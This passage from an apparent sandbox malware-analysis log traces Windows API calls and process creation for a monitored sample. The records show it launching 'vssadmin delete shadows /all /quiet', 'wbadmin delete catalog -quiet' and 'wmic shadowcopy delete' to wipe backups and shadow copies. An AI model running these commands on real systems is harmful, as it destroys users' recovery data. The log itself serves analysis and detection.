lpOverlapped=0x0) returned 1 [0127.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e328, cchWideChar=1 | out: lpWideCharStr="\nshadowcopy delete\n-quiet\nquiet\n") returned 1 [0127.150] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.150] GetFileType (hFile=0xa4) returned 0x3 [0127.150] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.150] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.150] GetFileType (hFile=0x10c) returned 0x3 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.150] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="exit\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="exit\n", lpUsedDefaultChar=0x0) returned 6 [0127.150] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cf538, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf538*=0x5, lpOverlapped=0x0) returned 1 [0127.150] GetProcessHeap () returned 0x3e0000 [0127.150] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3ff630 [0127.150] GetProcessHeap () returned 0x3e0000 [0127.150] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ff630 | out: hHeap=0x3e0000) returned 1 [0127.150] GetProcessHeap () returned 0x3e0000 [0127.150] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3f97e0 [0127.150] GetProcessHeap () returned 0x3e0000 [0127.150] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f4610 [0127.151] GetConsoleOutputCP () returned 0x1b5 [0127.151] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0127.151] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0127.151] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0127.151] GetProcessHeap () returned 0x3e0000 [0127.151] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3f8900 [0127.151] GetProcessHeap () returned 0x3e0000 [0127.151] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f4640 [0127.151] GetProcessHeap () returned 0x3e0000 [0127.151] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x21c) returned 0x3e1ab0 [0127.151] GetConsoleTitleW (in: lpConsoleTitle=0x3e1ac0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0127.151] GetProcessHeap () returned 0x3e0000 [0127.151] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e1ab0, Size=0x80) returned 0x3e1ab0 [0127.151] GetProcessHeap () returned 0x3e0000 [0127.152] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e1ab0) returned 0x80 [0127.152] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - exit") returned 1 [0127.152] GetProcessHeap () returned 0x3e0000 [0127.152] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1ab0 | out: hHeap=0x3e0000) returned 1 [0127.152] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0127.153] exit (_Code=0) Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x41ac2000" os_pid = "0x358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1c4" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0xc4 Thread: id = 7 os_tid = 0x32c Thread: id = 8 os_tid = 0x290 Thread: id = 9 os_tid = 0x7b0 Thread: id = 10 os_tid = 0x57c Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x3fe19000" os_pid = "0x780" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ab99" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 13 os_tid = 0x7c4 Thread: id = 14 os_tid = 0x5d8 Thread: id = 15 os_tid = 0x488 [0062.590] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe6da80 | out: lpSystemTimeAsFileTime=0xe6da80*(dwLowDateTime=0xf1dde6d0, dwHighDateTime=0x1d63e6c)) [0062.590] GetCurrentProcessId () returned 0x780 [0062.590] GetCurrentThreadId () returned 0x488 [0062.590] GetTickCount () returned 0x11472df [0062.590] QueryPerformanceCounter (in: lpPerformanceCount=0xe6da88 | out: lpPerformanceCount=0xe6da88*=18122355150) returned 1 [0062.591] malloc (_Size=0x100) returned 0x5a8e80 Thread: id = 16 os_tid = 0x790 Thread: id = 17 os_tid = 0x7ac Thread: id = 18 os_tid = 0x1c0 Thread: id = 19 os_tid = 0x5b8 Thread: id = 34 os_tid = 0x664 Thread: id = 50 os_tid = 0xaf4 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 20 os_tid = 0x674 Thread: id = 21 os_tid = 0xc0 Thread: id = 22 os_tid = 0x768 Thread: id = 23 os_tid = 0x764 Thread: id = 24 os_tid = 0x758 Thread: id = 25 os_tid = 0x724 Thread: id = 26 os_tid = 0x718 Thread: id = 27 os_tid = 0x714 Thread: id = 28 os_tid = 0x630 Thread: id = 29 os_tid = 0x154 Thread: id = 30 os_tid = 0x150 Thread: id = 31 os_tid = 0x120 Thread: id = 32 os_tid = 0x118 Thread: id = 33 os_tid = 0xf0 Thread: id = 45 os_tid = 0x3a4 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3f31e000" os_pid = "0x648" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005af4c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 35 os_tid = 0x6c0 Thread: id = 36 os_tid = 0x318 Thread: id = 37 os_tid = 0x634 Thread: id = 38 os_tid = 0x7e4 Thread: id = 39 os_tid = 0x5c4 Thread: id = 40 os_tid = 0x600 Thread: id = 44 os_tid = 0x99c Thread: id = 49 os_tid = 0xaf8 Process: id = "8" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x5c2d3000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1c4" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0xbc8 Thread: id = 47 os_tid = 0xb54 Thread: id = 48 os_tid = 0x618 Thread: id = 51 os_tid = 0xae8 Thread: id = 52 os_tid = 0xabc Thread: id = 53 os_tid = 0xafc Process: id = "9" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x4d640000" os_pid = "0x5b8" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1d8" cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e953" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 54 os_tid = 0xbd8 Thread: id = 55 os_tid = 0x7a8 Thread: id = 56 os_tid = 0xb40 Thread: id = 57 os_tid = 0x670 Thread: id = 58 os_tid = 0xac0 Thread: id = 59 os_tid = 0xb3c Thread: id = 60 os_tid = 0x664 Thread: id = 74 os_tid = 0x72c Process: id = "10" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x5af99000" os_pid = "0xb58" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e953" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 61 os_tid = 0xb7c Thread: id = 62 os_tid = 0xb74 Thread: id = 63 os_tid = 0xb88 Thread: id = 64 os_tid = 0xb5c Thread: id = 65 os_tid = 0xac4 Thread: id = 66 os_tid = 0xa58 Process: id = "11" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x4f64b000" os_pid = "0xb84" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\vds.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005edb0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 67 os_tid = 0x88c Thread: id = 68 os_tid = 0x81c Thread: id = 69 os_tid = 0x80c Thread: id = 70 os_tid = 0xb8c Thread: id = 71 os_tid = 0xbd4 Thread: id = 72 os_tid = 0x5e0 Thread: id = 73 os_tid = 0x114 Thread: id = 75 os_tid = 0x748 Thread: id = 76 os_tid = 0x8dc Thread: id = 77 os_tid = 0x8bc Thread: id = 80 os_tid = 0x7e0 Thread: id = 85 os_tid = 0x220 Thread: id = 86 os_tid = 0x6b0 Thread: id = 87 os_tid = 0x7a4 Thread: id = 88 os_tid = 0x500 Thread: id = 89 os_tid = 0x96c Thread: id = 141 os_tid = 0x9cc Thread: id = 144 os_tid = 0x244 Process: id = "12" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4ddd9000" os_pid = "0x208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1c4" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 78 os_tid = 0x6d8 [0116.390] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fcb0 | out: lpSystemTimeAsFileTime=0x16fcb0*(dwLowDateTime=0x11173010, dwHighDateTime=0x1d63e6d)) [0116.390] GetCurrentProcessId () returned 0x208 [0116.390] GetCurrentThreadId () returned 0x6d8 [0116.390] GetTickCount () returned 0x1153f81 [0116.390] QueryPerformanceCounter (in: lpPerformanceCount=0x16fcb8 | out: lpPerformanceCount=0x16fcb8*=23502362100) returned 1 [0116.391] GetModuleHandleW (lpModuleName=0x0) returned 0xff3b0000 [0116.391] __set_app_type (_Type=0x1) [0116.391] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3fced0) returned 0x0 [0116.391] __wgetmainargs (in: _Argc=0xff422380, _Argv=0xff422390, _Env=0xff422388, _DoWildCard=0, _StartInfo=0xff42239c | out: _Argc=0xff422380, _Argv=0xff422390, _Env=0xff422388) returned 0 [0116.393] ??0CHString@@QEAA@XZ () returned 0xff422ab0 [0116.395] malloc (_Size=0x30) returned 0x2f5a80 [0116.395] malloc (_Size=0x70) returned 0x2f7ab0 [0116.395] malloc (_Size=0x50) returned 0x2f5ac0 [0116.395] malloc (_Size=0x30) returned 0x2f7b30 [0116.395] malloc (_Size=0x48) returned 0x2f7b70 [0116.396] malloc (_Size=0x30) returned 0x2f7bc0 [0116.396] malloc (_Size=0x30) returned 0x2f7c00 [0116.396] ??0CHString@@QEAA@XZ () returned 0xff422f58 [0116.396] malloc (_Size=0x30) returned 0x2f7c40 [0116.396] ?Empty@CHString@@QEAAXXZ () returned 0x7fef927482c [0116.396] SetConsoleCtrlHandler (HandlerRoutine=0xff3f5724, Add=1) returned 1 [0116.396] _onexit (_Func=0xff40f378) returned 0xff40f378 [0116.396] _onexit (_Func=0xff40f490) returned 0xff40f490 [0116.396] _onexit (_Func=0xff40f4d0) returned 0xff40f4d0 [0116.396] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.396] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0116.401] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0116.411] CoCreateInstance (in: rclsid=0xff3b73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3b7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff422940 | out: ppv=0xff422940*=0x1b91390) returned 0x0 [0116.968] GetCurrentProcess () returned 0xffffffffffffffff [0116.968] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16fa80 | out: TokenHandle=0x16fa80*=0x100) returned 1 [0116.968] GetTokenInformation (in: TokenHandle=0x100, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16fa78 | out: TokenInformation=0x0, ReturnLength=0x16fa78) returned 0 [0116.968] malloc (_Size=0x118) returned 0x2f63c0 [0116.968] GetTokenInformation (in: TokenHandle=0x100, TokenInformationClass=0x3, TokenInformation=0x2f63c0, TokenInformationLength=0x118, ReturnLength=0x16fa78 | out: TokenInformation=0x2f63c0, ReturnLength=0x16fa78) returned 1 [0116.969] AdjustTokenPrivileges (in: TokenHandle=0x100, DisableAllPrivileges=0, NewState=0x2f63c0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1709675728, Attributes=0xde82), (Luid.LowPart=0x0, Luid.HighPart=1564592, Attributes=0x0), (Luid.LowPart=0x67006f, Luid.HighPart=6357106, Attributes=0x46006d), (Luid.LowPart=0x730065, Luid.HighPart=4390973, Attributes=0x5c003a), (Luid.LowPart=0x67006f, Luid.HighPart=6357106, Attributes=0x20006d), (Luid.LowPart=0x65006c, Luid.HighPart=6029427, Attributes=0x6f0043))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0116.969] free (_Block=0x2f63c0) [0116.969] CloseHandle (hObject=0x100) returned 1 [0116.971] malloc (_Size=0x40) returned 0x2f63c0 [0116.971] malloc (_Size=0x40) returned 0x2f6410 [0116.971] malloc (_Size=0x40) returned 0x2f6460 [0116.971] malloc (_Size=0x20a) returned 0x2f64b0 [0116.971] GetSystemDirectoryW (in: lpBuffer=0x2f64b0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.971] free (_Block=0x2f64b0) [0116.971] malloc (_Size=0x18) returned 0x2f7fb0 [0116.971] malloc (_Size=0x18) returned 0x17dfb0 [0116.971] malloc (_Size=0x18) returned 0x2f64b0 [0116.971] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0116.971] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0116.971] free (_Block=0x2f7fb0) [0116.971] free (_Block=0x17dfb0) [0116.972] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0116.972] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0116.972] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.972] FreeLibrary (hLibModule=0x77940000) returned 1 [0116.972] free (_Block=0x2f64b0) [0116.972] _vsnwprintf (in: _Buffer=0x2f6460, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f6a8 | out: _Buffer="ms_409") returned 6 [0116.972] malloc (_Size=0x20) returned 0x2f64b0 [0116.973] GetComputerNameW (in: lpBuffer=0x2f64b0, nSize=0x16fa80 | out: lpBuffer="XDUWTFONO", nSize=0x16fa80) returned 1 [0116.973] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.973] malloc (_Size=0x14) returned 0x17dfb0 [0116.973] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.973] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16fa78 | out: lpNameBuffer=0x0, nSize=0x16fa78) returned 0x7fffffdd000 [0116.974] GetLastError () returned 0xea [0116.975] malloc (_Size=0x40) returned 0x2f64e0 [0116.975] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f64e0, nSize=0x16fa78 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16fa78) returned 0x1 [0116.981] lstrlenW (lpString="") returned 0 [0116.981] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.981] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0116.983] lstrlenW (lpString=".") returned 1 [0116.983] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.983] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0116.983] lstrlenW (lpString="LOCALHOST") returned 9 [0116.983] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0116.984] free (_Block=0x17dfb0) [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] malloc (_Size=0x14) returned 0x17dfb0 [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] malloc (_Size=0x14) returned 0x2f7fb0 [0116.984] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.984] malloc (_Size=0x8) returned 0x2f6530 [0116.984] malloc (_Size=0x18) returned 0x2f6550 [0116.984] malloc (_Size=0x30) returned 0x2f6570 [0116.984] malloc (_Size=0x18) returned 0x2f65b0 [0116.984] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.984] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.984] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.984] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.984] malloc (_Size=0x30) returned 0x2f65d0 [0116.984] malloc (_Size=0x18) returned 0x2f6610 [0116.984] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.984] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.985] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.985] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.985] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.985] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.985] malloc (_Size=0x30) returned 0x2f6630 [0116.985] malloc (_Size=0x18) returned 0x2f6670 [0116.985] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.985] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.985] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.985] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.985] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.985] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.985] malloc (_Size=0x30) returned 0x2f6690 [0116.985] malloc (_Size=0x18) returned 0x2f66d0 [0116.985] malloc (_Size=0x30) returned 0x2f66f0 [0116.985] malloc (_Size=0x18) returned 0x2f6730 [0116.985] SysStringLen (param_1="NONE") returned 0x4 [0116.985] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.985] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.985] SysStringLen (param_1="NONE") returned 0x4 [0116.985] malloc (_Size=0x30) returned 0x2f6750 [0116.985] malloc (_Size=0x18) returned 0x2f6790 [0116.985] SysStringLen (param_1="CONNECT") returned 0x7 [0116.985] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.985] malloc (_Size=0x30) returned 0x2f67b0 [0116.985] malloc (_Size=0x18) returned 0x2f67f0 [0116.985] SysStringLen (param_1="CALL") returned 0x4 [0116.985] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.985] SysStringLen (param_1="CALL") returned 0x4 [0116.986] SysStringLen (param_1="CONNECT") returned 0x7 [0116.986] malloc (_Size=0x30) returned 0x2f6810 [0116.986] malloc (_Size=0x18) returned 0x2f6850 [0116.986] SysStringLen (param_1="PKT") returned 0x3 [0116.986] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.986] SysStringLen (param_1="PKT") returned 0x3 [0116.986] SysStringLen (param_1="NONE") returned 0x4 [0116.986] SysStringLen (param_1="NONE") returned 0x4 [0116.986] SysStringLen (param_1="PKT") returned 0x3 [0116.986] malloc (_Size=0x30) returned 0x2f6870 [0116.986] malloc (_Size=0x18) returned 0x2f68b0 [0116.986] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.986] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.986] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.986] SysStringLen (param_1="NONE") returned 0x4 [0116.986] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.986] SysStringLen (param_1="PKT") returned 0x3 [0116.986] SysStringLen (param_1="PKT") returned 0x3 [0116.986] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.986] malloc (_Size=0x30) returned 0x2f8000 [0116.987] malloc (_Size=0x18) returned 0x2f6cd0 [0116.987] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.987] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.987] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.987] SysStringLen (param_1="PKT") returned 0x3 [0116.987] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.987] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.987] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.987] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.987] malloc (_Size=0x30) returned 0x2f8040 [0116.987] malloc (_Size=0x40) returned 0x2f6cf0 [0116.987] malloc (_Size=0x20a) returned 0x2f8fd0 [0116.987] GetSystemDirectoryW (in: 